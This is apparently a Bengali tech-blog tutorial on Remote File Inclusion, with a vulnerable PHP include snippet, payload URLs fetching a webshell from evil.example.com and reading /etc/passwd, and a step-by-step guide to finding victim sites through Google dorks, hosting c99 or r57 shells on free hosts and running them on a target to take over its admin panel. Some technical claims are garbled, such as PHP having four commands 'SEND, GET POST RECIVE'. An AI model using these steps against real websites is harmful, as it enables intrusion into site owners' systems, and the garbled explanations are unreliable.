আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???

4
418

ওয়েবসাইট এর নিরাপত্তার জন্য তাদের নির্বাহীরা অনেক কর্মপন্থা  নির্ধারণ করে থাকেন । কিন্তু ওয়েবসাইট এর সব বাগ ঠিক করা যায়। এর থেকে বড় প্রশ্ন হচ্ছে ওয়েবসাইটগুলো কি পুরোপুরি নিরাপদ?
আর ওয়েবসাইট গুলো এই দুর্বল নিরাপত্তা কে ধরাশায়ী করার একটি উপায় হল রিমোট ফাইল ইঙ্কলাসন (RFI)। আজকে এই পোস্ট এ আলোচনা করব এটি কি এবং এটি দিয়ে কিভাবে কাজ করতে হয় ।

Remote File Inclusion
Remote File Inclusion (RFI)
    হল এক ধরনের vulnerability বা দুর্বলতা । যা বেশিরভাগ ওয়েবসাইট এ খুজে পাওয়া যায় ।
এই ধরনের ত্রুটি একজন হ্যাকার কে সুযোগ করে দেয় রিমোট ফাইল সাধারনত স্ক্রিপ্ট এর মাধ্যমে ওয়েবসাইট এ প্রবেশ করার । সাধারন ভাবে এ ধরনের ত্রুটি অ্যাডমিনদের দ্বারা সৃষ্টি হয় । কারন তারা কোন তথ্য ওয়েবসাইট এ দেয়ার পর সেটির বাগ সম্পর্কে সচেতন থাকেন না। রিমোটে ফাইল এক্সটেনশন নিচের  পদ্ধতি গুলর মাধ্যমে হয়ে থাকে। অনেকে এগুলো কে আলাদা বলে গণ্য করে থাকেন কিন্তু এগুলো প্রকারভেদ হিসেবে RFI এর অংশ । এগুলো হল

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

Code execution on the web server
cross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation

উদাহরণ
ধরুন আপনি আপনার ওয়েবসাইট এ কোন php স্ক্রিপ্ট এর কন্টেন্ট দিলেন । php তে সাধারন ভাবে $_GET, $_POST, $_COOKIE এর মাধ্যমে rfi করা হয় । এখন আপনি যদি স্ক্রিপ্ট এ কোন ভুল করেন তাহলে সেখানে কোন ডাটা টাইপ মিসিং থাকে। আর এর ফলে সেখানে অতিরিক্ত একটি কোড এর লাইন হ্যাকার তৈরি করেন এবং অ্যাডমিন প্যানেল এ প্রবেশ করেন ।
php তে সাধারনত চার কম্যান্ড ব্যবহার হয় । এগুলো হল SEND,GET POST RECIVE
নিচের এই স্ক্রিপ্ট এর কথাই ধরুন। এখানে একটি ফাইল টাইপ কে রিকোয়েস্ট করা হয়েছে ।

<?php
   if (isset( $_GET['COLOR'] ) ){
      include( $_GET['COLOR'] . '.php' );
   }
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

এখন আপনি ওয়েবসাইট এ সুধু দেখেন get ,COLOR, blue এগুলো । কিন্তু যে কেউ COLOR parameter ব্যবহার করে এখানে অতিরিক্ত একটি ফাইল ঢুকিয়ে দিতে পারেন । কয়েকটি উদাহরণ দেই ।
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
এই কোড এর মাধ্যমে একটি ফাইল প্রবেশ করে যাতে malicious কনটেন্ট থাকে ।
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
এই কোড ব্যবহার করে হ্যাকার তার পূর্ব তৈরিকৃত নকল ওয়েবসাইট এ ভিসিটর দের নিয়ে যায় ।
/vulnerable.php?COLOR=/etc/passwd%00
এই ধরনের কোড নিয়ে যায় পাসওয়ার্ড ফাইল এ।
এই জিনিশ গুলো খুব কঠিন মনে হলে আমি আপনাদের এই ধরনের অ্যাটাক করার একটি সহজ পদ্ধতি সেখাব ।
Untitled-1.psd আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???

Let the Hacking Begin

 

~Vulnerability
Remote File inclusion এর  vulnerability সাধারন ভাবে সেসব ওয়েবসাইট এ পাওয়া যায়। যেগুলোর লিঙ্ক নিচের মত হয়ে থাকে
Www.Targetxyz.com/index.php?page=Anything
এ ধরনের সাইট খুযে পেতে চাইলে গুগল এ যেয়ে লিখুন “inurl:index.php?page=” । এটি সেই পেজ গুলো দেখাবে index.php?page= আছে । যে কোন একটি পেজ বাছাই করতে পারেন
এখন আপনাকে পরীক্ষা করতে হবে এটি RFI এর উপযোগী কিনা?
হ্যাকার রা এটি পরীক্ষা করতে সাধারনত নিচের কম্যান্ড ব্যবহার করেন ।
Www.Targetxyz.com/index.php?page=http://www.google.com
এখন ওয়েবসাইট টি যদি vulnerble হয় তাহলে গুগল এর এমন একটি পেজ দেখাবে । যেন একটি ওয়েবসাইট এর মধ্যে আরেকটি ওয়েবসাইট।

rfi আপনি কি জানেন রিমোট ফাইল ইঙ্কলাসন (RFI) কি ???এখন এটি পাওয়ার পর হ্যাকার রা শেল ব্যবহার করেন। শেল ব্যবহার করে তারা কন্ট্রোল প্যানেল এ প্রবেশ করার চেষ্টা করে থাকেন ।
এখন আপনার প্রস্ন হতে পারে আমি শেল পাব কোথায় । কিছ শেল আছে যার মাধ্যমে যে কোন ওয়েবসাইট এর কন্ট্রোল প্যানেল এর পুরো অ্যাক্সেস পাওয়া যায় । যেমন
c99  ,   r57  ,   b0yzone  , j32 ”   ইত্যাদি ।
আপনি এগুলো গুগল এ খুযতে পারেন “inurl:c99.txt”  or “inurl:r57.txt” লিখে সার্চ করুন এবং Save them as Shell.php।
আচ্ছা ধরুন আমার শেল হল
http://h1.kripway.com/rashdrhul/c99shell.ph
এখন আপনার শেল টি ফ্রী হস্টিং সাইট যেমন 110mb.com, filehoster.com এসব সাইট এ আপলোড করুন ।
এখন আপনার শেল আপলোড হলে সেটি এবার আপনি যে সাইট হ্যাক করছেন সেখানে exicute করে দিন । আমার শেল ঐ সাইট এর হিসেবে হবে

  Www.Targetxyz.com/index.php?page=http://h1.kripway.com/rashdrhul/c99shell.php?

 

এরপর অ্যাডমিন প্যানেল এর কন্ট্রোল আপনার কাছে চলে আসবে । যত সহজ করে বলছি সেটা এমন নাও হতে পারে । কাজ না করলে বিভিন্ন ধরনের শেল দিয়ে ট্রাই করতে হয় ।

 

শেষ কথা
এই পর্যন্তই ছিল । টিউন সম্পর্কে মতামত দেবেন ।
এরকম অনেক কিছু পাবেন > http://www.facebook.com/CY133R এ
আর আমার সাথে যুক্ত হতে পারেন > http://www.facebook.com/techfreak.unknown এ



টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

4 মন্তব্য

  1. ভালো লাগে এত সুন্দর মান সম্মত পোস্ট চোখে পরলে। ধন্যবাদ। আমার পোস্ট গুলো দেখুন ভালো লাগলে দয়া করে মন্তব্য করুণ। ধন্যবাদ।

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

four × three =